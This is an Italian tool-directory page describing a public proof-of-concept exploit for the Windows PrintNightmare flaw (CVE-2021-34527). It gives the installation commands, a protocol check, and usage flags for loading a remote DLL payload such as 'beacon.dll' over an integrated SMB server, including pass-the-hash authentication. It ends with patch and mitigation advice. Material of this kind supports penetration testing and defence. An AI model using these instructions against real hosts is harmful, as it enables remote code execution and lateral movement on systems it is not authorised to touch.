Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-34527 — Exploit PoC di PrintNightmare (CVE-2021-34527) | Kitploit
Strumenti/GitHubGitHub/m8sec/cve-2021-34527
Escalation di PrivilegiGenerazione di PayloadAnalisi delle VulnerabilitàExploitMovimento LateralePenetration Testing
GitHubm8sec/cve-2021-34527

CVE-2021-34527

Exploit PoC di PrintNightmare (CVE-2021-34527)

Vedi Repository
118193 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PrintNightmare (CVE-2021-34527)

Questa versione dell'exploit PrintNightmare è basata sul codice creato da Cube0x0, con le seguenti caratteristiche:

  • Capacità di colpire più host.
  • Server SMB integrato per la consegna del payload, eliminando la necessità di condivisioni file aperte.
  • L'exploit include entrambi i protocolli MS-RPRN e MS-PAR (definiti negli argomenti CMD).
  • Implementa la tecnica di @gentilkiwi's UNC bypass.

Installazione

Prima dell'esecuzione, installa l'ultima versione di impacket:

root@kitploit:~
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 setup install

git clone https://github.com/m8sec/CVE-2021-34527
cd CVE-2021-34527
python3 CVE-2021-34527.py -h

Test

Il rpcdump.py di Impacket può essere utilizzato per verificare i protocolli MS-PAR e MS-RPRN:

root@kitploit:~
>> rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

In alternativa, lo scanner ItWasAllADream di byt3bl33d3r's può essere usato per scansionare i target e validare la vulnerabilità RCE di PrintNightmare.

Screenshot

pnm

Utilizzo

root@kitploit:~
  -v VERBOSE            Enable verbose logging from SMB server
  -t TIMEOUT            Connection timeout

Authentication:
  -u USERNAME           Set username
  -H HASH, -hashes      Use NTLM Hash for authentication
  -p PASSWORD           Set password
  -d DOMAIN             Set domain
  --local-auth          Authenticate to target host, no domain

DLL Execution:
  -dll DLL                  Path to local DLL file to execute "beacon.dll"
  --remote-dll REMOTE_DLL   Remote dll "\\192.168.1.25\Share\beacon.dll"
  -share SHARE              Set local SMB share name
  --local-ip LOCAL_IP       Set local IP (defaults to primary interface)

Target(s):
  -pDriverPath PDRIVERPATH  Define Driver path. Example 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
  -port [destination port]  Destination port to connect to SMB Server
  -proto {MS-RPRN,MS-PAR}   Target protocol (Default=MS-RPRN)
  target                    192.168.2.2, target.txt, 10.0.0.0/24 (positional)

Rimedio

Microsoft ha rilasciato diverse patch per PrintNightmare, l'ultima delle quali nel Patch Tuesday di settembre 2021. Questa ha corretto la vulnerabilità sottostante e i successivi bypass scoperti. Per maggiori informazioni, visita la guida ufficiale di Microsoft:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

Ulteriori strategie per mitigare questa vulnerabilità includono:

  • Disabilitare il servizio Print Spooler sui sistemi non essenziali.
  • Disabilitare la stampa remota in ingresso tramite Criteri di gruppo

Riconoscimenti

  • @cube0x0 - per il codice Python dell'exploit e per i suoi contributi al progetto impacket.
  • @edwardzpeng e @lxf02942370 - per la scoperta iniziale e l'exploit di PrintNightmare.
Scarica lo strumento